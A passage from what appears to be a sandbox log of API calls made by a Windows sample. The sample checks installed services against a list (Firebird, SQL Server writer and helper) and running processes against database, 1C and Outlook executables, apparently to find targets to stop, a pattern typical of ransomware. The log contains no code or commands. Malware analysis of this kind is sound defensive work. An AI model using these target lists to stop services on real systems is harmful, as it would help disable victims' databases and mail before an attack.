returned 8 [0039.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0039.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0039.395] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0039.395] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0039.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0039.395] lstrlenW (lpString="BFE") returned 3 [0039.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0039.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0039.396] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0039.396] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0039.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0039.396] lstrlenW (lpString="CryptSvc") returned 8 [0039.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0039.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0039.396] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0039.396] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0039.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0039.396] lstrlenW (lpString="CscService") returned 10 [0039.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0039.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0039.396] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0039.396] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0039.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0039.396] lstrlenW (lpString="DcomLaunch") returned 10 [0039.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0039.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0039.396] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0039.396] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0039.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0039.396] lstrlenW (lpString="Dhcp") returned 4 [0039.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0039.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0039.396] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0039.396] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0039.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0039.396] lstrlenW (lpString="Dnscache") returned 8 [0039.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0039.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0039.396] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0039.396] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0039.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0039.397] lstrlenW (lpString="DPS") returned 3 [0039.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0039.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0039.397] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0039.397] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0039.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0039.397] lstrlenW (lpString="eventlog") returned 8 [0039.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0039.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0039.397] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0039.397] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0039.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0039.397] lstrlenW (lpString="EventSystem") returned 11 [0039.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0039.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0039.397] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0039.397] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0039.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0039.397] lstrlenW (lpString="gpsvc") returned 5 [0039.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0039.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0039.397] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0039.397] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0039.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0039.397] lstrlenW (lpString="iphlpsvc") returned 8 [0039.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0039.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0039.397] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0039.397] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0039.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0039.398] lstrlenW (lpString="LanmanServer") returned 12 [0039.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0039.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0039.398] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0039.398] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0039.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0039.398] lstrlenW (lpString="LanmanWorkstation") returned 17 [0039.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0039.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0039.398] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0039.398] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0039.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0039.398] lstrlenW (lpString="lmhosts") returned 7 [0039.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0039.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0039.398] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0039.398] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0039.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0039.398] lstrlenW (lpString="MMCSS") returned 5 [0039.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0039.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0039.398] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0039.398] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0039.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0039.398] lstrlenW (lpString="MpsSvc") returned 6 [0039.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0039.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0039.398] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0039.398] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0039.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0039.398] lstrlenW (lpString="Netman") returned 6 [0039.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0039.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0039.399] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0039.399] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0039.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0039.399] lstrlenW (lpString="netprofm") returned 8 [0039.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0039.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0039.399] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0039.399] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0039.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0039.399] lstrlenW (lpString="NlaSvc") returned 6 [0039.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0039.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0039.399] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0039.399] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0039.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0039.399] lstrlenW (lpString="nsi") returned 3 [0039.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0039.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0039.399] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0039.399] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0039.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0039.399] lstrlenW (lpString="PcaSvc") returned 6 [0039.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0039.399] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0039.399] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0039.399] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0039.399] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0039.399] lstrlenW (lpString="PlugPlay") returned 8 [0039.399] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0039.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0039.400] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0039.400] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0039.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0039.400] lstrlenW (lpString="Power") returned 5 [0039.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0039.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0039.400] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0039.400] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0039.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0039.400] lstrlenW (lpString="ProfSvc") returned 7 [0039.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0039.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0039.400] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0039.400] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0039.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0039.400] lstrlenW (lpString="RpcEptMapper") returned 12 [0039.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0039.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0039.400] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0039.400] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0039.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0039.400] lstrlenW (lpString="RpcSs") returned 5 [0039.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0039.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0039.400] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0039.400] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0039.400] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0039.400] lstrlenW (lpString="SamSs") returned 5 [0039.400] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0039.400] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0039.401] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0039.401] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0039.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0039.401] lstrlenW (lpString="Schedule") returned 8 [0039.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0039.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0039.401] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0039.401] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0039.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0039.401] lstrlenW (lpString="SENS") returned 4 [0039.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0039.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0039.401] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0039.401] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0039.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0039.401] lstrlenW (lpString="ShellHWDetection") returned 16 [0039.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0039.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0039.401] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0039.401] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0039.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0039.401] lstrlenW (lpString="Spooler") returned 7 [0039.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0039.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0039.401] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0039.401] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0039.401] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0039.401] lstrlenW (lpString="swprv") returned 5 [0039.401] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0039.401] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0039.401] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0039.402] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0039.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0039.402] lstrlenW (lpString="SysMain") returned 7 [0039.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0039.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0039.402] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0039.402] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0039.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0039.402] lstrlenW (lpString="Themes") returned 6 [0039.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0039.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0039.402] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0039.402] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0039.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0039.402] lstrlenW (lpString="TrkWks") returned 6 [0039.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0039.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0039.402] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0039.402] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0039.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0039.402] lstrlenW (lpString="UxSms") returned 5 [0039.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0039.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0039.402] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0039.402] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0039.402] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0039.402] lstrlenW (lpString="VSS") returned 3 [0039.402] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0039.402] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0039.402] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0039.402] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0039.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0039.403] lstrlenW (lpString="WdiServiceHost") returned 14 [0039.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0039.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0039.403] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0039.403] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0039.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0039.403] lstrlenW (lpString="WdiSystemHost") returned 13 [0039.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0039.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0039.403] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0039.403] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0039.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0039.403] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0039.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0039.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0039.403] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0039.403] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0039.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0039.403] lstrlenW (lpString="Winmgmt") returned 7 [0039.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0039.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0039.403] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0039.403] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0039.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0039.403] lstrlenW (lpString="WPDBusEnum") returned 10 [0039.403] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0039.403] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0039.403] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0039.403] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0039.403] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0039.403] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbcaca8 | out: hHeap=0xb10000) returned 1 [0039.404] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1bc [0039.406] Process32FirstW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0039.407] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0039.408] lstrlenW (lpString="System") returned 6 [0039.408] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0039.408] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0039.408] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0039.408] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0039.408] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0039.408] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0039.408] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0039.408] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0039.409] lstrlenW (lpString="smss.exe") returned 8 [0039.409] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0039.409] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0039.409] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0039.409] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0039.409] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0039.409] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0039.409] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0039.409] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0039.410] lstrlenW (lpString="csrss.exe") returned 9 [0039.410] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0039.410] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0039.410] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0039.410] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0039.410] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0039.410] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0039.410] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0039.410] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0039.411] lstrlenW (lpString="wininit.exe") returned 11 [0039.411] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0039.411] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0039.411] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0039.411] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0039.412] lstrlenW (lpString="csrss.exe") returned 9 [0039.412] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0039.412] lstrlenW (lpString="winlogon.exe") returned 12 [0039.413] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0039.413] lstrlenW (lpString="services.exe") returned 12 [0039.413] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0039.414] lstrlenW (lpString="lsass.exe") returned 9 [0039.414] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0039.415] lstrlenW (lpString="lsm.exe") returned 7 [0039.415] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.416] lstrlenW (lpString="svchost.exe") returned 11 [0039.416] Process32NextW (in: hSnapshot=0x1bc, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0039.416] lstrlenW (lpString="svchost.exe") 